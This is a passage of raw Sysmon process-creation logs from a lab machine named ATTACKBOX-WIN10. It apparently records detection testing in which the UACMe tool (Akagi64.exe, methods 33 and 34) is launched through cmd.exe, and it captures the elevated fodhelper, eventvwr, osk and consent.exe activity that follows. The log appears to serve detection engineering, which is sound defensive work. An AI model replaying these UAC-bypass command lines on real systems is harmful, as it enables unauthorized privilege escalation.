-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B8-6552-4303-000000001E00}1564C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679827Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.479{51A89197-C7B8-6552-4303-000000001E00}1564C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7B8-6552-4203-000000001E00}2468C:\Windows\System32\fodhelper.exe"C:\Windows\system32\fodhelper.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679732Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.332{51A89197-C7B8-6552-4203-000000001E00}2468C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679473Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.159{51A89197-C7B8-6552-4103-000000001E00}3948C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 324 0000025DF37D7600C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000679465Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:56.126{51A89197-C7B8-6552-4003-000000001E00}4252C:\Windows\System32\fodhelper.exe10.0.17134.1 (WinBuild.160101.0800)Features On Demand HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationFodHelper.EXE"C:\Windows\system32\fodhelper.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=84C1DE94E002DE58009973F5DD16241D286201A5,MD5=1D1F9E564472A9698F1BE3F9FEB9864B,SHA256=B52FBB99308493A27AAC725CF70721041CDEE61CACA19792B949CC0867A27964,IMPHASH=9B87653B0F199E556A5CCF9C623D328F{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679332Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:55.564{51A89197-C7B7-6552-3F03-000000001E00}7084C:\DetectionTesting\Temp\ExternalPayloads\uacme\34 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=A18306D7AAF4F4AD0E463A44C27061596C65EFC2,MD5=356FD203060181072EF9DF355D09C73C,SHA256=A00B876D8512482A677015C83BB88C270D0E77DC19AE087CAF47CBA904D06C0D,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679300Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:55.494{51A89197-C7B7-6552-3E03-000000001E00}4980C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679293Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:55.486{51A89197-C7B7-6552-3D03-000000001E00}2852C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679091Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.673{51A89197-C7B3-6552-3C03-000000001E00}7708C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B3-6552-3B03-000000001E00}8044C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679083Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.661{51A89197-C7B3-6552-3B03-000000001E00}8044C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7B3-6552-3A03-000000001E00}184C:\Windows\System32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679036Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.556{51A89197-C7B3-6552-3A03-000000001E00}184C:\Windows\System32\mmc.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft Management ConsoleMicrosoft® Windows® Operating SystemMicrosoft Corporationmmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=382008FBA9480F6568DB3E1F335D080192DE62CA,MD5=BA80301974CC8C4FB9F3F9DDB5905C30,SHA256=683C0CB518B3FE31CFFA7FCF79F5EFC18D355C6D52734757758ED26AE5950037,IMPHASH=A4839A4F4C2BB2C12AA47ACB52D27833{51A89197-C7B3-6552-3903-000000001E00}7484C:\Windows\System32\eventvwr.exe"C:\Windows\system32\eventvwr.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000679005Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.519{51A89197-C7B3-6552-3903-000000001E00}7484C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678958Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.452{51A89197-C7B3-6552-3803-000000001E00}6092C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000678716Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.299{51A89197-C7B3-6552-3703-000000001E00}5956C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 318 0000025DF1F4CCA0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000678706Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.278{51A89197-C7B3-6552-3603-000000001E00}7936C:\Windows\System32\eventvwr.exe10.0.17134.1 (WinBuild.160101.0800)Event Viewer Snapin LauncherMicrosoft® Windows® Operating SystemMicrosoft Corporationeventvwr.exe"C:\Windows\system32\eventvwr.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=28BB161C17A1F502EFADE3F88273C8D489C8FD23,MD5=D9F31E9C7E898BC057FFEBD6D5A25979,SHA256=0EE8F607E5CCD6D0AB3296BBB37254C096CAC9EC464FD8AA75F0838C8F40276B,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678583Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:51.087{51A89197-C7B3-6552-3503-000000001E00}7604C:\Program Files\Windows Media Player\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Program Files\Windows Media Player\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961HighSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000678341Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.916{51A89197-C7B2-6552-3403-000000001E00}5764C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 396 0000025DF47CF570C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000678308Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.877{51A89197-C7B2-6552-3303-000000001E00}6160C:\Program Files\Windows Media Player\osk.exe10.0.17134.376 (WinBuild.160101.0800)Accessibility On-Screen KeyboardMicrosoft® Windows® Operating SystemMicrosoft Corporationosk.exe"C:\Program Files\Windows Media Player\osk.exe" C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=05039ED9DBFB513A18649D946FEA67EC1715DF58,MD5=FAF01C3C0E977AA81B925B1B81C8919B,SHA256=F855FFB4F49EFE66EFCDF28E0710637FE34E7A89E38A9493C88153220CD873AD,IMPHASH=701A7B99D329B6D4E6B9C4CB9292D8A5{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677969Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:50.465{51A89197-C7B2-6552-3203-000000001E00}5832C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F06FC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000677637Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.891{51A89197-C7B1-6552-3103-000000001E00}4924C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F076E0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000677467Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.319{51A89197-C7B1-6552-2F03-000000001E00}1844C:\DetectionTesting\Temp\ExternalPayloads\uacme\33 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1F0D1F86060682CEA6D5280220F949D625CB24CA,MD5=ADD1714CA3C62BC66B865C49410403BA,SHA256=36ECF63E1AC794B5FFC860EB5830EECED032F9345535776AEAA397F93D9CCADC,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677435Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.252{51A89197-C7B1-6552-2E03-000000001E00}704C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677428Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:49.240{51A89197-C7B1-6552-2D03-000000001E00}5348C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000677300Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:48.598{51A89197-C7B0-6552-2B03-000000001E00}2724C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000677244Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:48.539{51A89197-C7B0-6552-2A03-000000001E00}4468C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000676971Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:48.103{51A89197-C7B0-6552-2903-000000001E00}4500C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F076E0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000675845Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.398{51A89197-C79D-6552-2403-000000001E00}6752C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C79D-6552-2303-000000001E00}3796C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000675837Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.370{51A89197-C79D-6552-2303-000000001E00}3796C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C79D-6552-2203-000000001E00}6976C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7208 -ip 7208NT AUTHORITY\SYSTEM 154100x8000000000000000675807Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.282{51A89197-C79D-6552-2203-000000001E00}6976C:\Windows\SysWOW64\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7208 -ip 7208C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=185D44A7B9D0D38BFD891F2E397172B973D87249,MD5=5692CB2476B44EF30B756FC10602A641,SHA256=BD67230BB3BBAE5B79A9144BCF31D1F1E7F4E05299F54F9630785E89B3B51AB3,IMPHASH=349ED5D22EC6FCF1B2FBA053B24A869C{51A89197-C795-6552-0203-000000001E00}6904C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroupNT AUTHORITY\SYSTEM 154100x8000000000000000675773Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.205{51A89197-C79D-6552-2103-000000001E00}7208C:\Windows\SysWOW64\WerFault.exe10.0.17134.648 (WinBuild.160101.0800)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 100C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=185D44A7B9D0D38BFD891F2E397172B973D87249,MD5=5692CB2476B44EF30B756FC10602A641,SHA256=BD67230BB3BBAE5B79A9144BCF31D1F1E7F4E05299F54F9630785E89B3B51AB3,IMPHASH=349ED5D22EC6FCF1B2FBA053B24A869C{51A89197-C79D-6552-1D03-000000001E00}3452C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 80ATTACKBOX-WIN10\VICTIM 154100x8000000000000000675747Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:29.167{51A89197-C79D-6552-2003-000000001E00}7760C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT 